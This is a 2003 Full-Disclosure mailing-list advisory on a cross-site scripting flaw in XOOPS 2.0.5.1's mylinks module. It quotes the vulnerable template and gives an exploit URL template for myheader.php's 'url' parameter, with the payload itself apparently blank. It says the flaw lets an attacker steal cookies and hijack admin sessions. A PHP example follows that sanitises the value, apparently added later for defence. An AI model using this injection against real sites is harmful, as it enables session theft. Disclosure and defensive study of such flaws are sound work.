Re: [Full-Disclosure] XSS vulnerability in XOOPS 2.0.5.1
Chintan Trivedi
Mon, 22 Dec 2003 03:28:44 -0800
Another and easier way to exploit it will be
.
.
.
<td class='bg4' align="center"><small>
<a target="main" href=""><? echo _MD_RATETHISSITE; ?></a> | <a target="main" href=""><? echo _MD_MODIFY; ?></a> | <a target="main" href=""><? echo _MD_REPORTBROKEN; ?></a> | <a target='_top' href=''><? echo _MD_TELLAFRIEND; ?></a> | <a target='_top' href="">Back to <? echo $xoopsConfig['sitename']; ?></a> | <a target='_top' href="">Close Frame</a>
</small>
.
.
-----------------------------------
The value for variable "url" is used in line
<a target='_top' href="">Close Frame</a>
Thus an attacker can pass a JavaScript code as a value for variable url and get it executed as soon as the victim clicks the "Close Frame" link.
6. Exploit
==========
http://[target]/modules/mylinks/myheader.php?url="">
Clicking the above link, the victim gets directed to a page containing a link "Close Frame" which is actually the JavaScript code inserted by the attacker. The cookie revealed is quite informative for the attacker to log in with the hijacked user (including admin) privileges.
7. Credits
==========
Chintan Trivedi - http://www.hackersprogrammers.com
"Eye on Security Research Group - India " - www.eos-india.net
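
An added example, not part of the original post and not XOOPS code: one way to treat a user-supplied `url` value before it is written into the "Close Frame" href described above. The helper name `safe_href` and the sample inputs are assumptions constructed for illustration; it shows that HTML-escaping alone is not enough for an href, because the URL scheme must be restricted as well.

```php
<?php
// Added example: hypothetical helper, not taken from XOOPS.
// Returns a string that is safe inside href="..." or href='...',
// or '#' when the supplied URL is rejected.
function safe_href(string $url): string
{
    $url = trim($url);

    // Reject empty values and embedded control characters; browsers may
    // drop tabs/newlines before parsing the scheme ("java\tscript:").
    if ($url === '' || preg_match('/[\x00-\x1F\x7F]/', $url)) {
        return '#';
    }

    // Require an absolute URL with an explicit scheme and host.
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return '#';
    }

    // Allowlist the scheme: escaping does not neutralise "javascript:".
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return '#';
    }

    // Escape for the attribute context (both quote styles).
    return htmlspecialchars($url, ENT_QUOTES, 'UTF-8');
}

// Constructed sample inputs, not taken from the advisory.
$samples = [
    'http://example.org/page?a=1&b=2', // accepted, "&" becomes "&amp;"
    'javascript:void(0)',              // rejected: scheme not allowed
    '"><b>injected</b>',               // rejected: not an absolute URL
    "java\tscript:void(0)",            // rejected: control character
];

foreach ($samples as $s) {
    printf(
        "%-40s => <a target='_top' href=\"%s\">Close Frame</a>\n",
        json_encode($s),
        safe_href($s)
    );
}
```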